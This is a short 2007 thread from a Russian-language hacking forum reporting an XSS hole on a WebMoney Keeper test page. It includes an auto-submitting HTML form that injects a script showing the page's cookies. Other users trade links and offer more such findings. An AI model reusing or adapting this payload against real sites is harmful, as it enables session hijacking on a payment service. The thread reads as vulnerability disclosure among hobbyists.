XSS на keeper.webmoney.ru ;)

Discussion in 'Уязвимости' started by omg!, 4 Feb 2007.

  1. omg!

    omg! Banned

    Joined:
    30 Dec 2006
    Messages:
    34
    Likes Received:
    6
    Reputations:
    2
    нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:

    <form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
    <input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC([email protected])")</script>'>
    </form>
    <script>document.forms[0].submit();</script>
     
    #1 omg!, 4 Feb 2007
  2. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    линк на страничку покаж
     
    #2 tclover, 4 Feb 2007
  3. omg!

    omg! Banned

    Joined:
    30 Dec 2006
    Messages:
    34
    Likes Received:
    6
    Reputations:
    2
    http://forum.zloy.org/showthread.php?t=24296

    тут афтар отписался об XSS
     
    #3 omg!, 4 Feb 2007
  4. Gh0s7

    Gh0s7 Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    160
    Likes Received:
    231
    Reputations:
    242
    хссы на пост - тру, единственное, от них толку нет)
    Кста, me тожел нашел хсс в посте, кому линк надо?)
     
    #4 Gh0s7, 4 Feb 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.